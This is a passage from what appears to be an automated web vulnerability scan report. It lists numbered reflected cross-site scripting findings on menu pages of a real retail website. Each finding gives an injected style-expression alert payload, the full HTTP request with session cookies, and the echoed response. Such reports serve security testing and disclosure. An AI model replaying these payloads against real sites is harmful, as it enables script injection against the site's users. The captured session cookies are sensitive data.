GET /menu/food/ice-cream/caramel-macchiato-ice-cream?df808"style%3d"x%3aexpression(alert(1))"d48af3670c3=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:04:49 GMT
Connection: close
Content-Length: 38909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/ice-cream/caramel-macchiato-ice-cream?df808"style="x:expression(alert(1))"d48af3670c3=1"/>
...[SNIP]...

2.264. http://www.starbucks.com/menu/food/ice-cream/coffee-ice-cream [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/ice-cream/coffee-ice-cream

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4981d"style%3d"x%3aexpression(alert(1))"713a0269255 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4981d"style="x:expression(alert(1))"713a0269255 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/ice-cream/coffee-ice-cream?4981d"style%3d"x%3aexpression(alert(1))"713a0269255=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:05:17 GMT
Connection: close
Content-Length: 38702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/ice-cream/coffee-ice-cream?4981d"style="x:expression(alert(1))"713a0269255=1"/>
...[SNIP]...

2.265. http://www.starbucks.com/menu/food/ice-cream/java-chip-frappuccino-ice-cream [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/ice-cream/java-chip-frappuccino-ice-cream

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9c8a"style%3d"x%3aexpression(alert(1))"a6fb88be708 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9c8a"style="x:expression(alert(1))"a6fb88be708 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/ice-cream/java-chip-frappuccino-ice-cream?f9c8a"style%3d"x%3aexpression(alert(1))"a6fb88be708=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:05:21 GMT
Connection: close
Content-Length: 38920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/ice-cream/java-chip-frappuccino-ice-cream?f9c8a"style="x:expression(alert(1))"a6fb88be708=1"/>
...[SNIP]...

2.266. http://www.starbucks.com/menu/food/ice-cream/mocha-frappuccino-ice-cream [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/ice-cream/mocha-frappuccino-ice-cream

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 257c5"style%3d"x%3aexpression(alert(1))"1c951768a35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 257c5"style="x:expression(alert(1))"1c951768a35 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/ice-cream/mocha-frappuccino-ice-cream?257c5"style%3d"x%3aexpression(alert(1))"1c951768a35=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:06:07 GMT
Connection: close
Content-Length: 38836

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/ice-cream/mocha-frappuccino-ice-cream?257c5"style="x:expression(alert(1))"1c951768a35=1"/>
...[SNIP]...

2.267. http://www.starbucks.com/menu/food/ice-cream/peppermint-mocha-ice-cream [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/ice-cream/peppermint-mocha-ice-cream

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e9f1"style%3d"x%3aexpression(alert(1))"4d62ee870d0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2e9f1"style="x:expression(alert(1))"4d62ee870d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/ice-cream/peppermint-mocha-ice-cream?2e9f1"style%3d"x%3aexpression(alert(1))"4d62ee870d0=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:06:37 GMT
Connection: close
Content-Length: 38833

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/ice-cream/peppermint-mocha-ice-cream?2e9f1"style="x:expression(alert(1))"4d62ee870d0=1"/>
...[SNIP]...

2.268. http://www.starbucks.com/menu/food/ice-cream/signature-hot-chocolate-ice-cream [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/ice-cream/signature-hot-chocolate-ice-cream

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0a4d"style%3d"x%3aexpression(alert(1))"9e96fe99df4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f0a4d"style="x:expression(alert(1))"9e96fe99df4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/ice-cream/signature-hot-chocolate-ice-cream?f0a4d"style%3d"x%3aexpression(alert(1))"9e96fe99df4=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:06:25 GMT
Connection: close
Content-Length: 38968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/ice-cream/signature-hot-chocolate-ice-cream?f0a4d"style="x:expression(alert(1))"9e96fe99df4=1"/>
...[SNIP]...

2.269. http://www.starbucks.com/menu/food/ice-cream/strawberries-and-creme-frappuccino-ice-cream [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/ice-cream/strawberries-and-creme-frappuccino-ice-cream

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d87ac"style%3d"x%3aexpression(alert(1))"de1edf0e094 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d87ac"style="x:expression(alert(1))"de1edf0e094 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/ice-cream/strawberries-and-creme-frappuccino-ice-cream?d87ac"style%3d"x%3aexpression(alert(1))"de1edf0e094=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:06:34 GMT
Connection: close
Content-Length: 39107

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/ice-cream/strawberries-and-creme-frappuccino-ice-cream?d87ac"style="x:expression(alert(1))"de1edf0e094=1"/>
...[SNIP]...

2.270. http://www.starbucks.com/menu/food/ice-cream/vanilla-bean-frappuccino-ice-cream [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/ice-cream/vanilla-bean-frappuccino-ice-cream

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3a1e"style%3d"x%3aexpression(alert(1))"4551818f1b7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e3a1e"style="x:expression(alert(1))"4551818f1b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/ice-cream/vanilla-bean-frappuccino-ice-cream?e3a1e"style%3d"x%3aexpression(alert(1))"4551818f1b7=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:07:31 GMT
Connection: close
Content-Length: 38897

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/ice-cream/vanilla-bean-frappuccino-ice-cream?e3a1e"style="x:expression(alert(1))"4551818f1b7=1"/>
...[SNIP]...

2.271. http://www.starbucks.com/menu/food/salads/farmers-market-salad [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/salads/farmers-market-salad

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a321"style%3d"x%3aexpression(alert(1))"41fb35d7151 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1a321"style="x:expression(alert(1))"41fb35d7151 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/salads/farmers-market-salad?1a321"style%3d"x%3aexpression(alert(1))"41fb35d7151=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:00:03 GMT
Connection: close
Content-Length: 41349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/salads/farmers-market-salad?1a321"style="x:expression(alert(1))"41fb35d7151=1"/>
...[SNIP]...

2.272. http://www.starbucks.com/menu/food/salads/fruit-cup [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/salads/fruit-cup

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70519"style%3d"x%3aexpression(alert(1))"4a15c0eea7e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 70519"style="x:expression(alert(1))"4a15c0eea7e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/salads/fruit-cup?70519"style%3d"x%3aexpression(alert(1))"4a15c0eea7e=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:00:51 GMT
Connection: close
Content-Length: 40422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/salads/fruit-cup?70519"style="x:expression(alert(1))"4a15c0eea7e=1"/>
...[SNIP]...

2.273. http://www.starbucks.com/menu/food/salads/garden-pesto-salad [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/salads/garden-pesto-salad

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 902fd"style%3d"x%3aexpression(alert(1))"a1481263ac9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 902fd"style="x:expression(alert(1))"a1481263ac9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/salads/garden-pesto-salad?902fd"style%3d"x%3aexpression(alert(1))"a1481263ac9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:00:31 GMT
Connection: close
Content-Length: 38600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/salads/garden-pesto-salad?902fd"style="x:expression(alert(1))"a1481263ac9=1"/>
...[SNIP]...

2.274. http://www.starbucks.com/menu/food/salads/picnic-pasta-salad [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/salads/picnic-pasta-salad

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e882"style%3d"x%3aexpression(alert(1))"92587de2079 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5e882"style="x:expression(alert(1))"92587de2079 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/salads/picnic-pasta-salad?5e882"style%3d"x%3aexpression(alert(1))"92587de2079=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:00:44 GMT
Connection: close
Content-Length: 41357

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/salads/picnic-pasta-salad?5e882"style="x:expression(alert(1))"92587de2079=1"/>
...[SNIP]...

2.275. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/chicken-santa-fe [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/sandwiches-panini-and-wraps/chicken-santa-fe

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21399"style%3d"x%3aexpression(alert(1))"64c8a4cbb38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 21399"style="x:expression(alert(1))"64c8a4cbb38 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/sandwiches-panini-and-wraps/chicken-santa-fe?21399"style%3d"x%3aexpression(alert(1))"64c8a4cbb38=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:02:36 GMT
Connection: close
Content-Length: 42767

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/chicken-santa-fe?21399"style="x:expression(alert(1))"64c8a4cbb38=1"/>
...[SNIP]...

2.276. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/egg-salad-sandwich [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/sandwiches-panini-and-wraps/egg-salad-sandwich

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92a9e"style%3d"x%3aexpression(alert(1))"5df87dc4572 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 92a9e"style="x:expression(alert(1))"5df87dc4572 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/sandwiches-panini-and-wraps/egg-salad-sandwich?92a9e"style%3d"x%3aexpression(alert(1))"5df87dc4572=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:01:41 GMT
Connection: close
Content-Length: 42082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/egg-salad-sandwich?92a9e"style="x:expression(alert(1))"5df87dc4572=1"/>
...[SNIP]...

2.277. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/roasted-tomato-and-mozzarella [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/sandwiches-panini-and-wraps/roasted-tomato-and-mozzarella

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95062"style%3d"x%3aexpression(alert(1))"9a2157818d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 95062"style="x:expression(alert(1))"9a2157818d9 in the application's response.

